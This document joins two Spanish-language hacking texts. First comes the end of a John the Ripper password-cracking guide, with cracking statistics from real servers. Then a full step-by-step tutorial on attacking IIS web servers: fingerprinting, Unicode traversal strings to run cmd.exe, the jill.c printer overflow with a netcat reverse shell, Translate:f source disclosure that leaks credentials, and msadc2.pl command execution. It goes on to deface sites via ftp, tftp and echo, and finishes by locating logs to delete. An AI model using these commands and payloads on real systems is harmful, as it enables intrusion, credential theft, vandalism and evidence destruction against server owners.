 Si el passwd esta shadow entonces tenemos que conseguir el /etc/shadow
 pues al tenerlo tenemos que unir el shadow y el passwd para asi poder
 trabajar con el john, para eso esta el unshadow, se usa asi:

unshadow PASSWORD-FILE SHADOW-FILE

 y te mostrar  en pantalla el archivo unido, pero eso no nos sirve,
 tenemos que unirlo, entonces lo redireccionamos a otro archivo asi

unshadow PASSWORD-FILE SHADOW-FILE > nuevo-passwd

 y luego podemos usar el archivo nuevo-passwd normalmente, como hemos
 visto anteriormente.

 Al conseguir un password este es enviado a un archivo llamado john.pot
 y si hemos conseguido 2 passwords, no hay problema para saber cual es cual
 pero si tenemos mas de 1000 passwords la cosa se nos complica, para eso
 esta la opcion show, esta muestra los passwords crackeados, despues de
 haber crackeado algunos passwords ponemos esto.

john -show nuevo-passwd

 y pasa igual que con el shadow asi que lo hacemos asi

john -show nuevo-passwd > logins-passes

 y donde va el password encriptado, pondra el password ya crackeado

                                 Restore  
                                 ÍÍÍÍÍÍÍ  
           
 El restore es de mucha utilidad, sobre todo si estas crackeando passwords
 muy dif¡ciles de crackear que llevan dias, meses, a¤os, siglos (bueno aqui
 como que exagero un poco jeje) en crackear, ya que podemos parar cuando
 lo deseamos y continuar cuando queramos desde el mismo lugar donde paramos,
 ¨arrecho no?
 Para usar el restore hacemos lo siguiente
 queremos crackear el password del root de la NASA

john -i passwd-root

 paramos la ejecucion con CRTL C, y la resturamos asi

john -re

-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
Nota: El john the ripper es muy flexible en cuanto a abreviaciones, como
por ejemplo el caso anterior, coloque, john -re que es igual a john -restore
tambien en el caso john -i passwd es igual a john -incremental:all passwd
john -wordfile:password.lst passwd es igual a john -w:passwd.lst passwd
john -i passwd -session:restore2 es igual a john -i passwd -se:restore2
john -single passwd es igual a john -si passwd etc, deben haber muchas
mas que no he colocado aqui, b£scalas y me avisas
-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-

 Pero al parar una ejecuci¢n con CRTL C, el crea un archivo llamado restore
 en el cual estan los datos de como iba el crackeo al momento de ser
 interrumpido, y si por un descuido no hemos terminado de crackear ese
 password y ponemos al john the ripper a crackear otro pass, el borra ese
 restore y crea otro con la informacion del password que se esta crackeando,
 para evitar esto hacemos esto

john -i passwd-root -se:restore-root

y para restaurarlos solo pones

john -re:restore-root

y listo, problema solucionado

 Tambien podemos buscar passwords especificos, como por ejemplo alg£n tipo
 de shell, los que tengan privilegios 0:0 (root), etc,

john -w:password.lst -rules -users:0 passwd
john -w:password.lst -rules -group:0 passwd
john -w:password.lst -rules -shells:sh,csh,tcsh,bash passwd

puede haber muchas variaciones, lo podemos poner en modo incremental en
vez de poner con listas de palabras

john -i -users:0 passwd

en fin, hay mucha posiblidades

                              Estad¡sticas      
                              ÍÍÍÍÍÍÍÍÍÍÍÍ      

 Este texto no fue solamente escrito para quienes quieren violar la
 seguridad de un sistema, sino tambien para los administradores que
 quieran mantener su sistema fuera del alcance de un intruso,  mis
 recomendaciones personales son que deberian pasarle de vez en cuando
 el john the ripper a su sistema para asi saber quienes tienen passwords
 facilmente crackeables y obligarlos a cambiar estos passwords ya que
 por su inconciencia ponen en juego la seguridad del sistema, segun
 resultados REALES podemos ver lo siguiente:

       Host N§ 1

 En un servidor con 3916 cuentas fueron crackeados 1703 lo cual es un
 43.5%, de esos 1703 passwords en modo single fueron crackeados 970 lo
 que equivale a un 24.77% del total de passwords y un 57% del total de
 passwords crackeados, los otros 733 passwords fueron crackeados con
 listas de palabras, no fue usado el modo -rules ya que tardaria
 demasiado en terminar, debido a la gran cantidad de passwords, pero
 de seguro saldr¡an muchos mas, de estos passwords solo salieron 4 en
 modo incremtal:digits, claro, no lo deje terminar, por la misma raz¢n,
 pero revisando los passwords crackeados 51 (1.3%) passwords son el mismo
 login, ejemplo, login: pepe password: pepe lo que es un gran peligro
 para el sistema, algunos son ciudades o paises, caracas (11 veces),
 barinas, maturin, y otras palabras como cocacola, cracker, y nombres
 (de mujeres y de hombres) entre otros, ¨que haria una buena pol¡tica
 con respecto a los passwords? veamos el proximo ejemplo...

       Host N§ 2

 En un host con una pol¡tica en la escojencia de los passwords muy buena,
 seg£n dicen por ahi, hay una carta que te leen al momento de darte una
 cuenta en el servidor en la cual comentan la importancia de tener un
 password seguro, no solo para tu seguridad, sino la seguridad del
 sistema, ha dado resultados pero siempre hay gente que no le para,
 aqui hay 1359 cuentas y se nota que si funciono un poco la politica
 de esta empresa, en modo single crackea solo 17 passwords, lo cual
 viene siendo el 1.25%, comparado con el 24.77% del ejemplo anterior
 se nota bastante la diferencia, y con listas de palabras fueron
 crackeados hasta 40 passwords, lo que seria un 3%, que no se acerca
 ni remotamente al 43.5% anteriormente visto, de estos 17 solo en 3
 casos el login y el password era el mismo, lo que seria un 0.22%
 tambien aqui gana este servidor, en contra del 1.3% del servidor
 anterior, concluyendo, es muy importante una buena pol¡tica para la
 escojencia de passwords pero no es 100% segura, a ver... creo que tengo
 otros passwd por aca, veamos...

       Host N§ 3

 Aja, aqui est , analicemos esta situaci n, bueno este host me cay¢ bien,
 sin duda el administrador esta aprendiendo unix por correspondencia,
 parece que ya sabe usar el finger, jeje, si, la verdad, se ve bastante
 de esto si buscas bien, administradores que cobran sin trabajar, bueno,
 sigamos aqui hay 401 cuentas, de las cuales en modo single fueron
 crackeados 143 passwords 35.66%, no parece alarmante en comparaci¢n
 con el primer host evaluado pero si analizamos un poco... veamos, de
 los 143 passwords crackeados 71 son el mismo login, ¨increible no? un
 17.7% wow, que newbies no? seguimos comparando?? pues en el primer host
 esta misma cifra era un 1.3%, en el segundo un 0.22% y aqui un GRAN
 17.7%, osea se podr n imaginar que puede pasar en este caso }:->

 Algo que casi se me olvidaba es que siempre salen bastantes passwords
 de  este  estilo, por  ejemplo, login  cuaima y  password  cuaima98 o
 cuaima97 o 99 esto es muy importante a la hora de hacer un ataque de
 fuerza bruta, en este host hubo 31 passwords de este tipo.

                          Recomendaciones Finales     
                          ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ     

 Tengo otros /etc/passwd por ahi pero no quiero inundar esto de n£meros
 aunque me parece muy importante ver cuales son las debilidades en cuanto
 a los passwords usados por los usuarios comunes, mi recomendacion para los
 administradores es ademas de la pol¡tica de passwords como en el ejemplo
 numero 2, seria como dije arriba, pasarle a su sistema el john the ripper
 por lo menos una vez por semana y avisarle a los usuarios sobre sus
 passwords y que deben cambiarlos ya que ponen en peligro el sistema, y
 si  ellos no lo  hacen lo hace  el mismo  administrador  y le envias el
 password  antes  de cambiarlo porsupuesto,  pero esto  se debe  hacer
 inmediatamente, ya que si alguien ya entro a el sistema que manejamos
 quizas  ya tenga  el /etc/passwd  y cambiar  todos los  passwords en un
 sistema de 3000 usuarios es mas dificil no?

Hacking IIs Webservers por Pasos

1. Introduccion & Disclaimer:

Ke onda raza, escribire este simple manual, no por que no tenga nada mas que hacer
mas bien para todos los Newbies y que quieran aprender hacerle deface, etc.. a los
IIs servers ( Internet Information Server ) ya que el IIs es el webserver por defecto de los
NT , Win2k Server, etc. pero no siempre esos Os's traeran ese webserver unos traen
apache (win32) o Lotus Domino. etc. Bueno en este tutorial solo hablare de unas cuantas
vulnerabilidades. ( no todas las ke hay).

A. Disclaimer:

No soy y ni me hare responsable por lo que hagan con esta informacion en este tutorial.
Es solo para fines educacionales. :p

B. Podran distribuir este tutorial en otros sitios con que nomas no se altere el contenido
sin el consentimiento mio y menos cambiar los creditos, O ver otro manual iwal demasiado
parecido al mio. El credito es para IpMazter ipmaster@icestorm.com | www.securenterprise.org
bueno empezemos .!

2. Como hayar servers corriendo IIs webservers:

Pueden buscar cada sitio ke vean ke es lo ke ese site corre. ( no se los recomiendo duraran mucho)
o se pueden bajar un scanner como el Grabbb pa linux ke con solo poner un rango de ip's y el puerto
ke kieren hayar como por ejemplo:

[root@maximus ipmazter]# ./grabbb
grabbb 0.0.1 by scut of teso

usage: ./grabbb [options]  

Entonces agarramos un rango de una sub-red la ke ustedes se les antoje.

Ok supongamos ke tienen unos cuantos sites pa ver ke ke onda! pos tenemos ke saber
que webserver corren esos sites podemos usar  ( www.netcraft.com ) pa ke nos diga el Os
y el Webserver ke corre ese site ejemplo:

The Site www.victim.com  is Running Microsoft-IIs/5.0 on Windows 2000

Eso fue facil y rapido :) pero hay mas maneras pa saber ke Webserver estan usando ese sitio.
Tambien podriamos usar Nmap para ( *.nix ) si es ke lo tienes en tu makina linux o desde tu shell
ke tengas. veamos : tienes ke ser r00t pa poder ver el Os del sistema operativo ke estas scaneando.

[root@maximux ipmazter] # nmap -v -sS -O www.victima.com

Starting nmap V. 2.54BETA30 ( www.insecure.org/nmap/)
Host  (209.23.1.xxx) appears to be up ... good.
Initiating  SYN Stealth Scan against   ( 209.23.1.xxx)
Adding open port  80/tcp
Adding open port  443/tcp
Adding open port  1025/tcp
Adding open port  25/tcp
Adding open port  5631/tcp
Adding open port  1030/tcp
Adding open port  3389/tcp
Adding open port  445/tcp
Adding open port  135/tcp
Adding open port  21/tcp
The SYN Stealth Scan took 44 seconds to scan 1549 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled.
Interesting ports on (209.23.1.xxx) :
( The 1539 ports scanned but not shown below are in state: closed )
Port                         State                       Service
21/tcp                      open                         ftp
25/tcp                      open                         smtp
80/tcp                      open                         http      <---------  the one we need here open !
135/tcp                    open                         loc-srv
443/tcp                    open                         https
445/tcp         open             microsoft-ds
1025/tcp        open             listen
1030/tcp        open             iad1
3389/tcp        open             msrdp
5631/tcp        open             pcanywheredata   
Remote operating system guess: Windows NT4 / Win95 / Win98
TCP Sequence Prediction: Class=trivial time dependency
                         Difficulty=3 (Trivial joke) 

Etc.. como veran ese OS es un NT4 y pos como webserver tiene el IIs 4.0

Tambien Netcat te puede dar informacion sobre los webservers de un sitio.
ejemplo:

c:\nc>nc -vv www.victima.com 80     
www.victimsite.com [209.xx.xxx.xx] 80 (http) open
GET / HTTP/1.0
[CRLF]                <--- ke le aplastes enter unas 2 veces.
[CRLF]

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Mon, 28 Jan 2002 00:31:46 GMT
Content-Type: text/html
Content-Length: 87

The parameter is incorrectsent 2, rcvd 224 : NOTSOCK

etc.. obtendran un resultado parecido si es ke es un IIs.
como podran ver nos dice ke es un IIs 5.0 el sitio ese.

O puedes crear un texto preconfigurado con informacion ke puede
ser redireccionada con el netcat pa ahorrarse uno mas tiempo.
Creamos un texto llamado iis.txt ke contenga estos comandos:

GET / HTTP/1.0
[CRLF]
[CRLF]

y redireccionarlo atraves de Netcat Ejem:

c:\nc>nc -vv www.victima.com 80 <\ iis.txt

Los resultados seran como en el ejemplo anterior!

Bueno ahora tenemos un IIs 5.0 al parecer... entonces ke hacemos? umm
hay que checar el sitio con varias vulnerabilidades como el " decode"
IIs 5.0 printer Overflow, Translate: f , masadc2.pl , etc..
solo esas fallas veremos en este tutorial. asi ke veamos:
Nos bajamos un decodecheck.pl ( un perl script) ke cheke si es vulnerable
el sitio ke keremos scanear , pero primero tendras ke tener un compilador
de perl pa poder usar el programita ese. te puedes ir a www.activestate.com
o bajalo de la web de www.securenterprise.org en la seccion de downloads y luego
free software. esta ya linkiado el download.ok continuemos.
chekemos el sitio con el programa del decodecheck.pl ke tenemos.

C:\Perl\bin>perl decodecheck.pl www.victim.com:80
Testing www.victim.com:80 : Vulnerable

Uyy! como podran darse cuenta hayamos un server vulnerable al decode :)
los programas ke kieras correr de perl en win32. ponlos en las carpetas
perl y luego en Bin y usalo en ms-dos como ahi podras ver.!

O tambien la forma facil de volada si es ke no tienen el programa ese
a la mano.. pongan el string mas facil y corton en su web address Ejem:

www.victima.com/scripts/..%255c../winnt/system32/cmd.exe/c+dir+c:\

enter y si les sale algo como a continuacion van bien hasta ahorita!
Traten de usar proxies es recomendable al menos ke estes en un cybercafe hoho!
podran hayar suficientes en www.cyberarmy.com/lists.
bueno espero y les salga algo como esto a continuacion:

Directory of c:\

01/15/02  11:17p        DIR          kid porn files
12/19/01  03:14p        DIR         dame
11/12/01  12:19p               656,018 Exchange Server Setup.log
11/12/01  11:16a        DIR          ExchSrvr
12/10/01  08:54a        DIR          INetPub
01/27/02  12:00a        DIR          InterScan
12/20/01  12:39p        DIR          InterScan eManager
01/27/02  08:51p        DIR          Ipmazter_was_here
11/12/01  11:06a                17,178 mpssetup.log
11/12/01  11:06a        DIR          MSP
11/14/01  08:28a        DIR          oracle


Ah ke bien ya tamos adentro, cheken por mas particiones en el server
puede ke no nomas sea C: sino d: o los 2 o hasta mas g: f: etc..!

Tambien podemos usar Netcat pa ke nos salga eso , haciendo lo mismo ke la ves
pasada creamos un texto llamado decode.txt y le ponemos la siguiente string:

GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\  HTTP/1.0
[carriage return]
[carriage return]

Y esto mas o menos sera el resultado a la hora de redireccionarlo con Netcat:

c:\nc>nc -vv www.victim.com 80 <\ decode.txt
www.victim.com [195.23.43.xxx] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIs/5.0
Date: Mon, 15 June 2001  16:03:35 GMT
Content-type: application/octect-stream
Volume in drive C has no label.
Volume Serial Number is 8631-765F

Directory of c:\

01/15/02  11:17p        DIR          kid porn files
12/19/01  03:14p        DIR          dame
11/12/01  12:19p               656,018 Exchange Server Setup.log
11/12/01  11:16a        DIR          ExchSrvr
12/10/01  08:54a        DIR         INetPub
01/27/02  12:00a        DIR          InterScan
12/20/01  12:39p        DIR          InterScan eManager
01/27/02  08:51p        DIR          Ipmazter_was_here
11/12/01  11:06a                17,178 mpssetup.log
11/12/01  11:06a        DIR          MSP
11/14/01  08:28a        DIR          oracle


Ya ven ahi ta !! :)

Tambien pueden obtener algo parecido al ejemplo anterior y ejecutar comandos
a la ves tambien con el decodexecute2.pl ejem: ( tamos usandolo desde linux).

[root@maximus ipmazter]# perl -x decodexecute.pl www.victim.com:80 'dir'
Executing dir on 209.34.65.xxx:80
HTTP/1.1 200 OK
Server: Microsoft-IIs/4.0
Date: Mon, 23 May 2000 01:23:52 GMT
Content-Type: application/octet-stream
Volume in drive C has no label
Volume Serial Number is F984-772F
Directory of C:\Inetpub\scripts
12/10/01  08:54a    DIR..
01/27/02  12:00a    DIR...
2 file(s) 10 bytes
15,345,324 bytes free

Bueno parece ser ke podemos ya ejecutar comandos, ya lo ke hagan de ahi
es problema suyo , usen su imaginacio. :D
-----------------------------------------------------------------------------
Todo lo anterior fue con la falla del decode , ahora veremos la falla del
IIs 5.0 printer overflow. ( jill.c ) veamos ocupamos el exploit llamado jill.c
ke lo puedes bajar de la pagina de securenterprise bajo la seccion de exploits
Y jill.c se corren en *nix ya tengas una shell o tu makina con linux.
Aunke tambien hay una version de ese exploit para win32 llamado IIs5-Koei
que lo puedes bajar tambien en la misma seccion ke del jill.c ..Ocuparas el
Netcat tambien aki y aki si es de afuerzitas. ahorita veran porque..
Ahora vemos como usaremos la falla del printer overflow y usaremos primero
el exploit version del win32 llamado IIs5-Koei..
solo tienen ke poner la web del server IIs 5.0 ke kieren ver si es vulnerable
y enter, pero primero poner tu netcat en escucha en el puerto 7882 por ke
ese puerto te dice el programa ke uses. :

c:\nc>nc -v -v -L -p 7882
DNS fwd/rev mismatch: localhost != darkstar
listening on [any] 7882...    <-- ahi ya esta en escucha en ese puerto.

si llega a ser vulnerable el sitio ese. te mandara una shella tu pc y veras
algo como esto Ejem:

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
C:\WINNT\system32>whoami
whoami
[carriage return]
NT AUTHORITY\SYSTEM

Como pueden ver ya tienen acceso al server como NT Authority\system.

Ahora miraremos como se usa el jill.c bajo linux :D
compilamos el exploit y veremos el usage!..

[root@maximus ipmazter]#cc jill.c -o jill
[root@maximus ipmazter]# ./jill
iis5 remote .printer overflow.
dark spyrit <\dspyrit@beavuh.org> / beavuh labs.
usage: ./jill   

Ok bueno el exploit asi se usa tienes ke poner a netcat (pa *nix) en escucha
en el puerto ke kieres ke este en escucha. aki usare el 2003.

[root@maximus ipmazter]#nc -vv -l -p 2003
listening on [any] 2003...

ok ya esta ahora ejecutar el exploit...!

[root@fbi.gov ipmazter]#./jill 209.victims.ip 80 200.your.ip.addr 2003
IIs5 remote .printer overflow.
dark spyrit <\dspyrit@beavuh.org> / beavuh labs.

Connecting...
Sent...

You may need to send a carriage on ur listener if the shell doesnt
appear ok !   <-- ese mensaje te saldra automaticamente ke le aplastes
enter unas 2 veces en donde tienes el listener pa ver si te da la shell.
si te sale algo asi ya pudistes!

[root@fbi.gov ipmazter]#nc -vv -l -p 2003
listening on [any] 2003...
connect to [209.xx.xxx.xxx] from etc [209.xx.xxx.xx] 1117
[ carriage return ]

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>
C:\WINNT\system32>whoami
whoami
[carriage return]
NT AUTHORITY\SYSTEM

Bueno ya vemos ke si agarro y ya tamos adentro ahora ya tenemos acceso
como NT AUTHORITY\SYSTEM y ahi pueden ver hize un " whoami" pa ver ke pex.!
------------------------------------------------------------------------------

Ahora hablaremos de la vulnerabilidad translate: f , es explotada por otro
IIs 5,0 ISAPI.DLL, httpx.dll, ke implementa Web Distributed Authoring y
Versioning IIs 5.0. WebDav is a microsoft-backed standard ke especifica
como autores remotos pueden editar y manejar Web Server Content por http.
Aki podemos hacer otro texto preconfigurado usando netcat como lo hemos
hecho ya anteriormente.

GET /global.asa\ HTTP/1.0
Translate: f
[CRLF]
[CRLF]

y redirecciona el texto ke hagas atraves de netcat al site vulnerable,
el source code del global.asa aparecera en texto. llamemos el texto ke
redireccionaremos ( fvul.txt )

c:\nc>nc -vv www.victim.com 80 <\ fvul.txt
www.victim.com [209.23.54.xxx] 80 (http) open
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 28 Jan 2002 00:31:46 GMT
Content-Type: application/octect-stream
Content-Length: 2790
Etag: "3874fdf79dff:kio"
Last-Modified: Mon, 21 Jan 2002 09:30:46 GMT
Accept-Ranges: bytes
Cache-Control: no-cache

<\objectRUNAT=Server SCOPE=Session ID=fixit PROGID="secure.object\">
("ConnectionText") = "DSN=phone;UID=stalker;Password=fuckoff
("ConnectionText") = "DSN=Backend;UID=stalker;PWD=test;"
("LDAPServer") = "LDAP://ldap.secureco.com:389"
("LDAPUserID") = "cn=Admin"
("LDAPPwd") = "Password" 

Como podran ver , hemos agarrado los passwds de multiples servers , incluyendo
un LDAP system. Ya hay un perl script ke te lo hara esto mas facil aun se llama
srcgrab.pl ( Srcgrab.pl exploits the Translate:f bug. la vulnerabilidad presente
en los IIs4.0 y 5.0 y Windows 2000 frontpage extensiones, hace ke un atacante
remoto vea el source code de las paginas .asp y .asa del server victima.

---------------------------------------------------------------------------------

Ahora hablaremos sobre la falla del msadc/rds. y esta sera la ultima de este
tutorial. hay un exploit llamado msadc2.pl ya listo en la red y lo puedes hayar
en securenterprise en la seccion de perl scripts. esta falla te deja ejecutar
comandos arbitrarios al webserver IIs 4.0. ahorita veremos un simple ejemplo
de un deface con el masdc2.pl a el server victima. si nos sale cmd/c !!
kiere decir ke ya la hicimos a lo mejor! el ejemplo sera en linux!


[root@fbi.gov ipmazter]# perl -x msadc2.pl -h www.victim.com
-- RDS exploit by rain forest puppy / ADM / Wiretrip --
Please type the NT commandline you want to run (cmd /c assumed):
cmd /c echo  IpMazter Ownz Ur site > c:\inetpub\wwwroot\index.htm

(asumiendo index.htm es la pagina principal de www.victim.com ) 

como ven solo le hice un echo al index. lo mas facil.!

TIP: ahora no solo por ke con el decode o con cualkiera otro de estos diga
"vulnerable " wow! poss nel.. todavia hay ke ver si tiene write access el web
folder. :( . asi es como podemos saber . aki usare la falla del decode pa ke vean
ya ke es la mas kemada de todas :).. hehe.


www.victim.com/scripts/..etc..../c+copy+c:\winnt\system32\cmd.exe+cmd2.exe

asi de simple pa saber si tiene acceso de escritura. no tiene ke ser siempre
el folder de scripts , hay muchos mas. en cualkier parte de la red pueden ver las
demas strings.

www.victim.com/scripts/..etc..../c+copy+c:\winnt\system32\cmd.exe+cmd2.exe

ok aki de nuevo si te sale algo como esto kiere decir ke vas bien:..

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers.
(1) files copied.

:) bueno vamos muy bien.parace ke si tenemos acceso de escritura en el server.

si les sale algo como en ves de lo anterior y ven esto:

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers.
 (o) files copied   <-- no acceso de escritura ya te chingastes mejor vete
                        a ver ke otro hayas :(

tambien podemos hacer este tambien o los 2 , etc.

www.victim.com/scripts/..etc.../c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\cmd2.exe

si dice iwal ke arriba ke (1) files copied , perfecto!!
----------------------------------------------------------------------------------

Ahora trataremos de subir nuestro hack.html en este caso pa hacerle deface.
puedes usar tu ftp de tu pc ke ya trae por defecto , o bajarte un cliente de ftp
como ws ftp pro o ftp serv-u aunke ese esta mas bien pa cuando haces defaces a los
*nix. luego lo comentare en el siguiente texto de defacing linux , etc.

Aki muestro un ejemplo facil con el ftp por defecto de la pc de uno.
ojala ke tenga acceso anonimo y tenga un directorio con acceso de escritura


C:\>ftp
ftp> open
To www.victim.com
Connected to www.victim.com
220 home Microsoft FTP Service (Version 3.0).
User (www.victim.com:(none)): anonymous  
331 Anonymous access allowed, send identity (e-mail name) as password
Password:
230 Anonymous user logged in.   <-- acceso anonimo perfecto
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
dwnload
iomega
kerner
LAserJ5L
napv2b7.exe
Netscape.exe
226 Transfer complete.           <-muy bien!
ftp: 62 bytes received in 0.16Seconds 0.39Kbytes/sec.
ftp> put hack.html
200 PORT command successful.      <-- si dice 550 hack.html acceso denegado , entonces usaremos otros metodos.
150 Opening ASCII mode data connection for 'hack.html'.
226 Transfer complete.
ftp: 1235 bytes received in 0.64Seconds 0.45Kbytes/sec.   
ftp> put hack.jpg
200 PORT command successful.
150 Opening ASCII mode data connection for 'hack.jpg'.
226 Transfer complete. 
ftp: 1300 bytes received in 0.15Seconds 0.35Kbytes/sec.
ftp> quit
221

Ahi como pudieron ver como subi el hack.html y la foto ke ira en el deface!
Ahora veremos con lo del decode donde jodidos esta nuestro .html
mayoria de veces uno lo hayara en c:\inetpub\ftproot , veamos:


Directory of c:\Inetpub

02/28/01  02:15p        DIR          .
02/28/01  02:15p        DIR          ..
05/04/01  10:46a        DIR          ftproot
05/04/01  11:36a        DIR          gophroot
03/03/02  03:26a        DIR          scripts
02/28/01  02:16p                   722 site_definition.wst
03/03/02  02:37a        DIR         wwwroot
               7 File(s)            722 bytes


ahora escalemos al dir de ftproot :D


Directory of c:\Inetpub\ftproot

05/04/01  10:46a        DIR          .
05/04/01  10:46a        DIR          ..
05/04/01  10:46a        DIR          dwnload
03/03/02  11:54a                       hack.html   <-- ahi esta nuestro html =)
03/03/02  11:54a                       hack.jpg
11/30/00  06:03a        DIR          iomega
05/14/01  10:46a        DIR         kerner
11/30/00  06:03a        DIR          LAserJ5L
08/22/00  07:13a             1,696,777 napv2b7.exe
08/28/00  09:05a            20,002,801 Netscape.exe
               10 File(s)     21,699,578 bytes
                            454,900,736 bytes free


ahora ke ya lo tenemos arriba en el server , primero debemos saber donde jodidos
esta la web ..

www.victim.com/scripts/..%255c../winnt/system32/cmd.exe?/c+set
y obetendremos algo como esto..:


CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:


ALLUSERSPROFILE=C:\Documents and Settings\All Users
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=SERVER_SII
ComSpec=C:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_ACCEPT_LANGUAGE=en-us
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=www.victim.com
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; StarBand Version 2.0)
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTPS=off
INSTANCE_ID=1
LOCAL_ADDR=your.ip.address.hehe  <- or the proxy ip.
NUMBER_OF_PROCESSORS=1
Os2LibPath=C:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=C:\DMI\win32\bin;C:\WINNT\system32;C:\WINNT;C:\WINNT\System32\Wbem
PATH_TRANSLATED=C:\Inetpub\wwwroot\   <-------------ahi esta el dir. de la web :)
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH

Nunca siempre estara donde mismo el directorio  por defecto es el
c:\inetpub\wwwroot\ylaweb.html

ahora pueden ir a ese dir. y ver donde esta el index.html o el default.htm
pero muchas veces veran un monton de .html's .asp's etc.. htm's. y dices utta!!
cual de todas seran ingao !!muy facil! vete al www.sitio.com. ya ke estas ahi
calale con los nombres de las paginas mas kemadas ke hay
www.site.com/index.html   <-- asi escribelo tu
www.site.com/index.htm
www.site.com/default.htm
www.site.com/default.asp
etc....

pero la ke se aparesca como ejem: www.site.com/index.htm entonces la web
se llama index.htm y como ya sabes donde esta pos dale gas rapidin.:)
puede ke los dir. de donde esta la web varee . por ejemplo en ves de estar en
c:\inetpub\wwwroot puede estar en d:\inetpub\web\keves\akinoesta\
etc.. hehe! por eso te servira un poco el comando del set. pa y mirar el
path_translated y te diga donde esta situada la web principal
Y si nomas no das una con hayarla puedes hacer un search por la web ejemplo:

www.victim.com/etc....etc.. cmd.exe?/c+dir+/S+c:\*.html
y te saldra algp parecido a esto..:


Directory of c:\Dell\Drivers\28693

07/30/99  11:22a                   857 Setup.html
               1 File(s)            857 bytes

 Directory of c:\InetPub\WWWroot\samples

07/26/00  10:16a                 1,548 index.html
               1 File(s)          1,548 bytes


y saldran massss!! hehe. ahi tu te las ingenuas !

ok ahora ke ya sabemos ke se llama index.htm ok.. y ke esta en el dir. de
c:\inetpub\wwwroot\        pos es hora de copiar nuestro hack.html ahi :)

www.victim.com/scripts/..%255c../inetpub/scripts/cmd2.exe?/c+copy+c:\inetpub\ftproot\hack.html+c:\inetpub\wwwroot\index.html

si te sale solo el error de CGI esta bien ! si te sale algo de access denied pos
kiere decir ke no tiene acceso de escritura el web folder y te la has pelado :(

como pueden ver ahi copie mi hack.html de ftproot por ke ahi estaba y lo mande al
dir. de la web original del server. hagan los mismo con la foto!

ahora metete a www.site.com , dale refresh y si sale pos felicidades y si no pos
ya te jodistes! o algo anda mal. ve y checa de nuevo en ke podistes haber fallado.

Ahora supongamos ke no podistes subir por ftp. por ke no tenia acceso anonimo el
el ftp o si tenia pero no habia directorios con escritura y no podias hacer
uploads al server. :( o simplemente ni ftp tenian o lo tienen firewalled etc..
Usaremos tftp ( trivial file transfer protocol / es el puerto UDP 69)
ese puerto tambien puede ke este deshabilitado por el admin o este firewalled, etc

bueno supongamos ke no hagamos lo siguiente.. bajemonos el cliente de tftp
pueden hayarlo en mi web de securenterprise, bajo free software.
instalemonos en nuestra pc y configuremoslo. etc.. el comando seria asi. ejem:

www.victim.com/...etc.../inetpub/scripts/cmd2.exe?/c+tftp+-i+Your.Ip.Adrres.+GET+hack.html+c:\inetpub\wwwroot\index.html 

Ya ves lo subimos por tftp y lo copeamos en el dir. domde kieras o en ese. ahi tu
luego lo acomodas si lo pones en otro folder.

Ahora si asi tampoco se llegara a poder ingaoo!! pos usaremos el echo command
es muy facil y simple. mayoria de gente webas lo usa! hehe
POdemos calar si podemos hacerle echo al index , y esto como prueba:

www.victim.com/...etc.../inetpub/scripts/cmd2.exe?/c+echo>+>c:\inetpub\wwwroot\hoho.html  

ahi esta el comando de prueba. si no algo de acceso denegado o otra mensada vas
bien, y vete si kieres a www.site.com/hoho.html  y veras ke dira " Echo is on"
kiere decir ke de seguro podremos hacerle echo al index.html :)

www.victim.com/...etc../inetpub/scripts/cmd2.exe?/c+echo+

Hacked!

defaced By
by
IpMazter
"+>c:\inetpub\wwwroot\index.html

como vemos en ese comando de echo le meti codigo html pa ke se vea mejor aun
el deface con el comando del echo. :)

O uno simple nomas www.site.com/..etc../inetpub/scripts/cmd2.exe?/c+echo+IpMazter hacked you+>c:\inetpub\wwwroot\index.html

y ya vayanse a www.site.com y refresh y ya veran!!el simple deface . bueno es todo
por ahorita sobre defacing IIs servers ( Winblowz) hehe. ahora borremos LOGS!!

Ok mayoria de logs los hayaras en :

www.victim.com..etc.,,,/c+dir+c:\winnt\system32\logfiles
                    or
www.victim.com..etc../c+dir+c:\winnt\system32\logfiles\w3svc1


ahi los veras tu.. estan asi de esta manera :

in020321.log  or ex020321.log  etc..

in020321.log = year 2002 the 03 for march the date 21  :)

Un simple ejemplo de como se ve :

www.victim.com..etc../c+dir+c:\winnt\system32\logfiles\w3svc1


Directory of c:\winnt\system32\logfiles\w3svc1

02-03-21  01:48p        DIR          .
02-03-21  01:48p        DIR          ..
00-09-05  12:18a               423,909 in000904.log
00-09-06  12:00a               571,107 in000905.log
00-09-07  12:00a               771,947 in000906.log
00-09-07  03:49p               196,608 in000907.log
00-09-09  12:00a               474,393 in000908.log
00-09-10  12:01a             1,114,833 in000909.log
00-09-11  12:00a               455,745 in000910.log
00-09-12  07:00a               360,205 in000911.log


ahi tan los logs!! uyy a borrar solo los ke creemos ke debemos borarr
